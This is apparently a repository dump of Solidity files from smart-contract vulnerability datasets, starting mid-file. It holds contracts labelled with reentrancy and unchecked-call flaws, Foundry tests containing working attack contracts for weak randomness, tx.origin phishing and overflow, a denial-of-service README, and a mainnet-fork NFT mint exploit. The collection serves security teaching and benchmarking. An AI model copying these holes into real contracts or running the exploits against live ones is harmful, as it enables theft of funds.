5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract MONEY_BOX 10 | { 11 | struct Holder 12 | { 13 | uint unlockTime; 14 | uint balance; 15 | } 16 | 17 | mapping (address => Holder) public Acc; 18 | 19 | uint public MinSum; 20 | 21 | Log LogFile; 22 | 23 | bool intitalized; 24 | 25 | function SetMinSum(uint _val) 26 | public 27 | { 28 | if(intitalized)throw; 29 | MinSum = _val; 30 | } 31 | 32 | function SetLogFile(address _log) 33 | public 34 | { 35 | if(intitalized)throw; 36 | LogFile = Log(_log); 37 | } 38 | 39 | function Initialized() 40 | public 41 | { 42 | intitalized = true; 43 | } 44 | 45 | function Put(uint _lockTime) 46 | public 47 | payable 48 | { 49 | var acc = Acc[msg.sender]; 50 | acc.balance += msg.value; 51 | if(now+_lockTime>acc.unlockTime)acc.unlockTime=now+_lockTime; 52 | LogFile.AddMessage(msg.sender,msg.value,"Put"); 53 | } 54 | 55 | function Collect(uint _am) 56 | public 57 | payable 58 | { 59 | var acc = Acc[msg.sender]; 60 | if( acc.balance>=MinSum && acc.balance>=_am && now>acc.unlockTime) 61 | { 62 | // REENTRANCY 63 | if(msg.sender.call.value(_am)()) 64 | { 65 | acc.balance-=_am; 66 | LogFile.AddMessage(msg.sender,_am,"Collect"); 67 | } 68 | } 69 | } 70 | 71 | function() 72 | public 73 | payable 74 | { 75 | Put(0); 76 | } 77 | 78 | } 79 | 80 | 81 | contract Log 82 | { 83 | struct Message 84 | { 85 | address Sender; 86 | string Data; 87 | uint Val; 88 | uint Time; 89 | } 90 | 91 | Message[] public History; 92 | 93 | Message LastMsg; 94 | 95 | function AddMessage(address _adr,uint _val,string _data) 96 | public 97 | { 98 | LastMsg.Sender = _adr; 99 | LastMsg.Time = now; 100 | LastMsg.Val = _val; 101 | LastMsg.Data = _data; 102 | History.push(LastMsg); 103 | } 104 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 44,97 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract Ownable 10 | { 11 | address newOwner; 12 | address owner = msg.sender; 13 | 14 | function changeOwner(address addr) 15 | public 16 | onlyOwner 17 | { 18 | newOwner = addr; 19 | } 20 | 21 | function confirmOwner() 22 | public 23 | { 24 | if(msg.sender==newOwner) 25 | { 26 | owner=newOwner; 27 | } 28 | } 29 | 30 | modifier onlyOwner 31 | { 32 | if(owner == msg.sender)_; 33 | } 34 | } 35 | 36 | contract Token is Ownable 37 | { 38 | address owner = msg.sender; 39 | function WithdrawToken(address token, uint256 amount,address to) 40 | public 41 | onlyOwner 42 | { 43 | // UNCHECKED_LL_CALLS 44 | token.call(bytes4(sha3("transfer(address,uint256)")),to,amount); 45 | } 46 | } 47 | 48 | contract TokenBank is Token 49 | { 50 | uint public MinDeposit; 51 | mapping (address => uint) public Holders; 52 | 53 | ///Constructor 54 | function initTokenBank() 55 | public 56 | { 57 | owner = msg.sender; 58 | MinDeposit = 1 ether; 59 | } 60 | 61 | function() 62 | payable 63 | { 64 | Deposit(); 65 | } 66 | 67 | function Deposit() 68 | payable 69 | { 70 | if(msg.value>MinDeposit) 71 | { 72 | Holders[msg.sender]+=msg.value; 73 | } 74 | } 75 | 76 | function WitdrawTokenToHolder(address _to,address _token,uint _amount) 77 | public 78 | onlyOwner 79 | { 80 | if(Holders[_to]>0) 81 | { 82 | Holders[_to]=0; 83 | WithdrawToken(_token,_amount,_to); 84 | } 85 | } 86 | 87 | function WithdrawToHolder(address _addr, uint _wei) 88 | public 89 | onlyOwner 90 | payable 91 | { 92 | if(Holders[msg.sender]>0) 93 | { 94 | if(Holders[_addr]>=_wei) 95 | { 96 | // UNCHECKED_LL_CALLS 97 | _addr.call.value(_wei); 98 | Holders[_addr]-=_wei; 99 | } 100 | } 101 | } 102 | 103 | 104 | } -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Randomness.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | /* 7 | GuessTheRandomNumber is a game where you win 1 Ether if you can guess the 8 | pseudo random number generated from block hash and timestamp. 9 | 10 | At first glance, it seems impossible to guess the correct number. 11 | But let's see how easy it is win. 12 | 13 | 1. Alice deploys GuessTheRandomNumber with 1 Ether 14 | 2. Eve deploys Attack 15 | 3. Eve calls Attack.attack() and wins 1 Ether 16 | 17 | What happened? 18 | Attack computed the correct answer by simply copying the code that computes the random number. 19 | */ 20 | 21 | 22 | contract ContractTest is Test { 23 | GuessTheRandomNumber GuessTheRandomNumberContract; 24 | Attack AttackerContract; 25 | 26 | function testRandomness() public { 27 | 28 | address alice = vm.addr(1); 29 | address eve = vm.addr(2); 30 | vm.deal(address(alice), 1 ether); 31 | vm.prank(alice); 32 | 33 | GuessTheRandomNumberContract = new GuessTheRandomNumber{value: 1 ether}(); 34 | vm.startPrank(eve); 35 | AttackerContract = new Attack(); 36 | console.log("Before exploiting, Balance of AttackerContract:",address(AttackerContract).balance); 37 | AttackerContract.attack(GuessTheRandomNumberContract); 38 | console.log("Eve wins 1 Eth, Balance of AttackerContract:",address(AttackerContract).balance); 39 | console.log("Exploit completed"); 40 | 41 | } 42 | receive() payable external{} 43 | } 44 | 45 | contract GuessTheRandomNumber { 46 | constructor() payable {} 47 | 48 | function guess(uint _guess) public { 49 | uint answer = uint( 50 | keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp)) 51 | ); 52 | 53 | if (_guess == answer) { 54 | (bool sent, ) = msg.sender.call{value: 1 ether}(""); 55 | require(sent, "Failed to send Ether"); 56 | } 57 | } 58 | } 59 | 60 | contract Attack { 61 | receive() external payable {} 62 | 63 | function attack(GuessTheRandomNumber guessTheRandomNumber) public { 64 | uint answer = uint( 65 | keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp)) 66 | ); 67 | 68 | guessTheRandomNumber.guess(answer); 69 | } 70 | 71 | // Helper function to check balance 72 | function getBalance() public view returns (uint) { 73 | return address(this).balance; 74 | } 75 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 44,97 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract Ownable 10 | { 11 | address newOwner; 12 | address owner = msg.sender; 13 | 14 | function changeOwner(address addr) 15 | public 16 | onlyOwner 17 | { 18 | newOwner = addr; 19 | } 20 | 21 | function confirmOwner() 22 | public 23 | { 24 | if(msg.sender==newOwner) 25 | { 26 | owner=newOwner; 27 | } 28 | } 29 | 30 | modifier onlyOwner 31 | { 32 | if(owner == msg.sender)_; 33 | } 34 | } 35 | 36 | contract Token is Ownable 37 | { 38 | address owner = msg.sender; 39 | function WithdrawToken(address token, uint256 amount,address to) 40 | public 41 | onlyOwner 42 | { 43 | // UNCHECKED_LL_CALLS 44 | token.call(bytes4(sha3("transfer(address,uint256)")),to,amount); 45 | } 46 | } 47 | 48 | contract TokenBank is Token 49 | { 50 | uint public MinDeposit; 51 | mapping (address => uint) public Holders; 52 | 53 | ///Constructor 54 | function initTokenBank() 55 | public 56 | { 57 | owner = msg.sender; 58 | MinDeposit = 1 ether; 59 | } 60 | 61 | function() 62 | payable 63 | { 64 | Deposit(); 65 | } 66 | 67 | function Deposit() 68 | payable 69 | { 70 | if(msg.value>MinDeposit) 71 | { 72 | Holders[msg.sender]+=msg.value; 73 | } 74 | } 75 | 76 | function WitdrawTokenToHolder(address _to,address _token,uint _amount) 77 | public 78 | onlyOwner 79 | { 80 | if(Holders[_to]>0) 81 | { 82 | Holders[_to]=0; 83 | WithdrawToken(_token,_amount,_to); 84 | } 85 | } 86 | 87 | function WithdrawToHolder(address _addr, uint _wei) 88 | public 89 | onlyOwner 90 | payable 91 | { 92 | if(Holders[msg.sender]>0) 93 | { 94 | if(Holders[_addr]>=_wei) 95 | { 96 | // UNCHECKED_LL_CALLS 97 | _addr.call.value(_wei); 98 | Holders[_addr]-=_wei; 99 | } 100 | } 101 | } 102 | 103 | function Bal() public constant returns(uint){return this.balance;} 104 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 44,97 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract Ownable 10 | { 11 | address newOwner; 12 | address owner = msg.sender; 13 | 14 | function changeOwner(address addr) 15 | public 16 | onlyOwner 17 | { 18 | newOwner = addr; 19 | } 20 | 21 | function confirmOwner() 22 | public 23 | { 24 | if(msg.sender==newOwner) 25 | { 26 | owner=newOwner; 27 | } 28 | } 29 | 30 | modifier onlyOwner 31 | { 32 | if(owner == msg.sender)_; 33 | } 34 | } 35 | 36 | contract Token is Ownable 37 | { 38 | address owner = msg.sender; 39 | function WithdrawToken(address token, uint256 amount,address to) 40 | public 41 | onlyOwner 42 | { 43 | // UNCHECKED_LL_CALLS 44 | token.call(bytes4(sha3("transfer(address,uint256)")),to,amount); 45 | } 46 | } 47 | 48 | contract TokenBank is Token 49 | { 50 | uint public MinDeposit; 51 | mapping (address => uint) public Holders; 52 | 53 | ///Constructor 54 | function initTokenBank() 55 | public 56 | { 57 | owner = msg.sender; 58 | MinDeposit = 1 ether; 59 | } 60 | 61 | function() 62 | payable 63 | { 64 | Deposit(); 65 | } 66 | 67 | function Deposit() 68 | payable 69 | { 70 | if(msg.value>=MinDeposit) 71 | { 72 | Holders[msg.sender]+=msg.value; 73 | } 74 | } 75 | 76 | function WitdrawTokenToHolder(address _to,address _token,uint _amount) 77 | public 78 | onlyOwner 79 | { 80 | if(Holders[_to]>0) 81 | { 82 | Holders[_to]=0; 83 | WithdrawToken(_token,_amount,_to); 84 | } 85 | } 86 | 87 | function WithdrawToHolder(address _addr, uint _wei) 88 | public 89 | onlyOwner 90 | payable 91 | { 92 | if(Holders[msg.sender]>0) 93 | { 94 | if(Holders[_addr]>=_wei) 95 | { 96 | // UNCHECKED_LL_CALLS 97 | _addr.call.value(_wei); 98 | Holders[_addr]-=_wei; 99 | } 100 | } 101 | } 102 | 103 | function Bal() public constant returns(uint){return this.balance;} 104 | } -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/txorigin.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | /* 7 | Wallet is a simple contract where only the owner should be able to transfer 8 | Ether to another address. Wallet.transfer() uses tx.origin to check that the 9 | caller is the owner. Let's see how we can hack this contract 10 | */ 11 | 12 | /* 13 | What happened? 14 | Alice was tricked into calling Attack.attack(). Inside Attack.attack(), it 15 | requested a transfer of all funds in Alice's wallet to Eve's address. 16 | Since tx.origin in Wallet.transfer() is equal to Alice's address, 17 | it authorized the transfer. The wallet transferred all Ether to Eve. 18 | */ 19 | 20 | 21 | contract ContractTest is Test { 22 | Wallet WalletContract; 23 | Attack AttackerContract; 24 | 25 | function testtxorigin() public { 26 | 27 | address alice = vm.addr(1); 28 | address eve = vm.addr(2); 29 | vm.deal(address(alice), 10 ether); 30 | vm.deal(address(eve), 1 ether); 31 | vm.prank(alice); 32 | WalletContract = new Wallet{value: 10 ether}(); //Alice deploys Wallet with 10 Ether 33 | console.log("Owner of wallet contract", WalletContract.owner()); 34 | vm.prank(eve); 35 | AttackerContract = new Attack(WalletContract); //Eve deploys Attack with the address of Alice's Wallet contract. 36 | console.log("Owner of attack contract", AttackerContract.owner()); 37 | console.log("Eve of balance", address(eve).balance); 38 | 39 | vm.prank(alice,alice); 40 | AttackerContract.attack(); // Eve tricks Alice to call AttackerContract.attack() 41 | console.log("tx origin address", tx.origin); 42 | console.log("msg.sender address", msg.sender); 43 | console.log("Eve of balance", address(eve).balance); 44 | } 45 | receive() payable external{} 46 | } 47 | 48 | contract Wallet { 49 | address public owner; 50 | constructor() payable { 51 | owner = msg.sender; 52 | } 53 | 54 | function transfer(address payable _to, uint _amount) public { 55 | require(tx.origin == owner, "Not owner"); 56 | 57 | (bool sent, ) = _to.call{value: _amount}(""); 58 | require(sent, "Failed to send Ether"); 59 | } 60 | } 61 | 62 | contract Attack { 63 | address payable public owner; 64 | Wallet wallet; 65 | 66 | constructor(Wallet _wallet) { 67 | wallet = Wallet(_wallet); 68 | owner = payable(msg.sender); 69 | } 70 | 71 | function attack() public { 72 | wallet.transfer(owner, address(wallet).balance); 73 | } 74 | } -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Overflow2.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.7.6; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | contract ContractTest is Test { 7 | TokenWhaleChallenge TokenWhaleChallengeContract; 8 | 9 | 10 | function testOverflow2() public { 11 | address alice = vm.addr(1); 12 | address bob = vm.addr(2); 13 | 14 | TokenWhaleChallengeContract = new TokenWhaleChallenge(); 15 | TokenWhaleChallengeContract.TokenWhaleDeploy(address(this)); 16 | console.log("Player balance:",TokenWhaleChallengeContract.balanceOf(address(this))); 17 | TokenWhaleChallengeContract.transfer(address(alice),800); 18 | 19 | vm.prank(alice); 20 | TokenWhaleChallengeContract.approve(address(this),1000); 21 | TokenWhaleChallengeContract.transferFrom(address(alice),address(bob),500); //exploit here 22 | 23 | console.log("Exploit completed, balance overflowed"); 24 | console.log("Player balance:",TokenWhaleChallengeContract.balanceOf(address(this))); 25 | } 26 | receive() payable external{} 27 | } 28 | contract TokenWhaleChallenge { 29 | address player; 30 | 31 | uint256 public totalSupply; 32 | mapping(address => uint256) public balanceOf; 33 | mapping(address => mapping(address => uint256)) public allowance; 34 | 35 | string public name = "Simple ERC20 Token"; 36 | string public symbol = "SET"; 37 | uint8 public decimals = 18; 38 | 39 | function TokenWhaleDeploy(address _player) public { 40 | player = _player; 41 | totalSupply = 1000; 42 | balanceOf[player] = 1000; 43 | } 44 | 45 | function isComplete() public view returns (bool) { 46 | return balanceOf[player] >= 1000000; 47 | } 48 | 49 | event Transfer(address indexed from, address indexed to, uint256 value); 50 | 51 | function _transfer(address to, uint256 value) internal { 52 | balanceOf[msg.sender] -= value; 53 | balanceOf[to] += value; 54 | 55 | emit Transfer(msg.sender, to, value); 56 | } 57 | 58 | function transfer(address to, uint256 value) public { 59 | require(balanceOf[msg.sender] >= value); 60 | require(balanceOf[to] + value >= balanceOf[to]); 61 | 62 | _transfer(to, value); 63 | } 64 | 65 | event Approval(address indexed owner, address indexed spender, uint256 value); 66 | 67 | function approve(address spender, uint256 value) public { 68 | allowance[msg.sender][spender] = value; 69 | emit Approval(msg.sender, spender, value); 70 | } 71 | 72 | function transferFrom(address from, address to, uint256 value) public { 73 | require(balanceOf[from] >= value); 74 | require(balanceOf[to] + value >= balanceOf[to]); 75 | require(allowance[from][msg.sender] >= value); 76 | 77 | allowance[from][msg.sender] -= value; 78 | _transfer(to, value); 79 | } 80 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x9d06cbafa865037a01d322d3f4222fa3e04e5488.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 54,65 5 | */ 6 | 7 | pragma solidity ^0.4.23; 8 | 9 | // ---------------------------------------------------------------------------------------------- 10 | // Project Delta 11 | // DELTA - New Crypto-Platform with own cryptocurrency, verified smart contracts and multi blockchains! 12 | // For 1 DELTA token in future you will get 1 DELTA coin! 13 | // Site: http://delta.money 14 | // Telegram Chat: @deltacoin 15 | // Telegram News: @deltaico 16 | // CEO Nechesov Andrey http://facebook.com/Nechesov 17 | // Telegram: @Nechesov 18 | // Ltd. "Delta" 19 | // Working with ERC20 contract https://etherscan.io/address/0xf85a2e95fa30d005f629cbe6c6d2887d979fff2a 20 | // ---------------------------------------------------------------------------------------------- 21 | 22 | contract Delta { 23 | 24 | address public c = 0xF85A2E95FA30d005F629cBe6c6d2887D979ffF2A; 25 | address public owner = 0x788c45dd60ae4dbe5055b5ac02384d5dc84677b0; 26 | address public owner2 = 0x0C6561edad2017c01579Fd346a58197ea01A0Cf3; 27 | uint public active = 1; 28 | 29 | uint public token_price = 10**18*1/1000; 30 | 31 | //default function for buy tokens 32 | function() payable { 33 | tokens_buy(); 34 | } 35 | 36 | /** 37 | * Buy tokens 38 | */ 39 | function tokens_buy() payable returns (bool) { 40 | 41 | require(active > 0); 42 | require(msg.value >= token_price); 43 | 44 | uint tokens_buy = msg.value*10**18/token_price; 45 | 46 | require(tokens_buy > 0); 47 | 48 | if(!c.call(bytes4(sha3("transferFrom(address,address,uint256)")),owner, msg.sender,tokens_buy)){ 49 | return false; 50 | } 51 | 52 | uint sum2 = msg.value * 3 / 10; 53 | // UNCHECKED_LL_CALLS 54 | owner2.send(sum2); 55 | 56 | return true; 57 | } 58 | 59 | //Withdraw money from contract balance to owner 60 | function withdraw(uint256 _amount) onlyOwner returns (bool result) { 61 | uint256 balance; 62 | balance = this.balance; 63 | if(_amount > 0) balance = _amount; 64 | // UNCHECKED_LL_CALLS 65 | owner.send(balance); 66 | return true; 67 | } 68 | 69 | //Change token 70 | function change_token_price(uint256 _token_price) onlyOwner returns (bool result) { 71 | token_price = _token_price; 72 | return true; 73 | } 74 | 75 | //Change active 76 | function change_active(uint256 _active) onlyOwner returns (bool result) { 77 | active = _active; 78 | return true; 79 | } 80 | 81 | // Functions with this modifier can only be executed by the owner 82 | modifier onlyOwner() { 83 | if (msg.sender != owner) { 84 | throw; 85 | } 86 | _; 87 | } 88 | 89 | 90 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/denial_of_service/README.md: -------------------------------------------------------------------------------- 1 | # Denial Of Service 2 | Including gas limit reached, unexpected throw, unexpected kill, access control breached. 3 | 4 | Denial of service is deadly in the world of Ethereum: while other types of applications can eventually recover, smart contracts can be taken offline forever by just one of these attacks. Many ways lead to denials of service, including maliciously behaving when being the recipient of a transaction, artificially increasing the gas necessary to compute a function, abusing access controls to access private components of smart contracts, taking advantage of mixups and negligence, etc. This class of attack includes many different variants and will probably see a lot of development in the years to come. 5 | 6 | Loss: estimated at 514,874 ETH (~300M USD at the time) 7 | 8 | ## Attack Scenario 9 | An auction contract allows its users to bid on different assets. 10 | To bid, a user must call a bid(uint object) function with the desired amount of ether. The auction contract will store the ether in escrow until the object's owner accepts the bid or the initial bidder cancels it. This means that the auction contract must hold the full value of any unresolved bid in its balance. 11 | The auction contract also contains a withdraw(uint amount) function which allows admins to retrieve funds from the contract. As the function sends the amount to a hardcoded address, the developers have decided to make the function public. 12 | An attacker sees a potential attack and calls the function, directing all the contract's funds to its admins. This destroys the promise of escrow and blocks all the pending bids. 13 | While the admins might return the escrowed money to the contract, the attacker can continue the attack by simply withdrawing the funds again. 14 | 15 | ## Examples 16 | In the following example (inspired by King of the Ether) a function of a game contract allows you to become the president if you publicly bribe the previous one. Unfortunately, if the previous president is a smart contract and causes reversion on payment, the transfer of power will fail and the malicious smart contract will remain president forever. Sounds like a dictatorship to me: 17 | ``` 18 | function becomePresident() payable { 19 | require(msg.value >= price); // must pay the price to become president 20 | president.transfer(price); // we pay the previous president 21 | president = msg.sender; // we crown the new president 22 | price = price * 2; // we double the price to become president 23 | } 24 | ``` 25 | In this second example, a caller can decide who the next function call will reward. Because of the expensive instructions in the for loop, an attacker can introduce a number too large to iterate on (due to gas block limitations in Ethereum) which will effectively block the function from functioning. 26 | ``` 27 | function selectNextWinners(uint256 _largestWinner) { 28 | for(uint256 i = 0; i < largestWinner, i++) { 29 | // heavy code 30 | } 31 | largestWinner = _largestWinner; 32 | } 33 | ``` 34 | ## References 35 | Taken from [DASP TOP10](https://dasp.co/) -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/NFTMint_exposedMetadata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity ^0.8.10; 3 | 4 | import "forge-std/Test.sol"; 5 | import "./interface.sol"; 6 | 7 | // https://twitter.com/Supremacy_CA/status/1596176732729769985 8 | 9 | contract ContractTest is DSTest{ 10 | IFantasticWeslie nftContract = IFantasticWeslie(0xf6FFBa463e46087FcdC3a51391bB675B0e2C1a40); // Fantastic Weslie 11 | 12 | CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); 13 | 14 | bytes32[] merkleTreeProof; 15 | 16 | function setUp() public { 17 | cheats.createSelectFork("mainnet", 16023847); 18 | } 19 | 20 | function testExploit() public{ 21 | //Since the contract is vulnerable to CVE-2022-38217 22 | //it could lead to the early disclosure of metadata of all NFTs in the project 23 | //As a result, attacker can find out valuable NFTs and then target mint specified NFTs by monitoring Mempool and sell the NFTs for a profit in secondary market 24 | 25 | //For example, Lets assume the attacker finds out that NFT#142 is a rare NFT, now he just has to moniter the mempool till NFT#141 is minted and then mint NFT#142 26 | //View Metadata of the NFTs via cURL -> curl -k https://bafybeic23x4v75z7isyqhy5p6ylzqutm6lnpobwngaouovdu6qjjvt4wpu.ipfs.dweb.link/142.json 27 | //The issue is the metadata should be visible after the minting is completed 28 | 29 | //etherscan tx - 0xfa4434236d2a9717e3410d7cdc60eed6acfddb054f58bc779c07349a1f45ce6b 30 | //etherscan tx - 0x24af97355f6cec4ae02fff8bbf7144a02857e3ffd36a650aa295c62f6272cc83 31 | 32 | address attacker = 0x1fCebBb5D3EACd26e70b0BD1E54a979a479906aA; 33 | cheats.prank(attacker); 34 | 35 | merkleTreeProof.push(0x0ea49bae9ab4f8b82fb0e0b5e876576c9a4a945edc2fa5a7b448fad470802ae6); 36 | merkleTreeProof.push(0x852233af3700b87dc51f6abf53d4f935746d746d84a33d4d7e6302d9c110fedd); 37 | merkleTreeProof.push(0x5de513269badb3a0b73e237a9f28f86994791f4421effd1865df975a0f8ee52c); 38 | merkleTreeProof.push(0xe52d780f15394a8f6254f328ca06a66909c41f1ee3adab33d02cd087f8c37604); 39 | merkleTreeProof.push(0xede88505e4259ab482a1019cc8d4364cf9e1e7866768245854c0f6e369d2b08c); 40 | merkleTreeProof.push(0x776fee48d9285a8e2d1ecde47354e9ebe91b10f0b5f2d754968af831a7047808); 41 | merkleTreeProof.push(0x3d13c4757d9e35123b8785040c29f232483941fb7d591b1a94167c1ca5e8875f); 42 | merkleTreeProof.push(0xc36c091c358833709f1b6f44e783e5d9ad5ad9f5f0ee09a37c376fd354827fb1); 43 | merkleTreeProof.push(0xce26991b2af9fc0fb807aea36667d37439ae7122d3ea8edcbfe92b04bf674922); 44 | merkleTreeProof.push(0x8452c207732923a758c53fb296f3d88340a04fe9c381c73ba44343a45340953e); 45 | merkleTreeProof.push(0xcc44822b3b5a19839899f6795622daff3bab327895558977ea58a30a42c6a49e); 46 | merkleTreeProof.push(0x45c575962e5a88b5e8c3aedf4e3e74306d0124f4cc86c25bc4cd1bcae16c54a0); 47 | 48 | nftContract.mint{value: 0.12 ether}(merkleTreeProof); 49 | 50 | console.log("Owner of NFT#142 : " , nftContract.ownerOf(142)); 51 | } 52 | } --------------------------------------------------------------------------------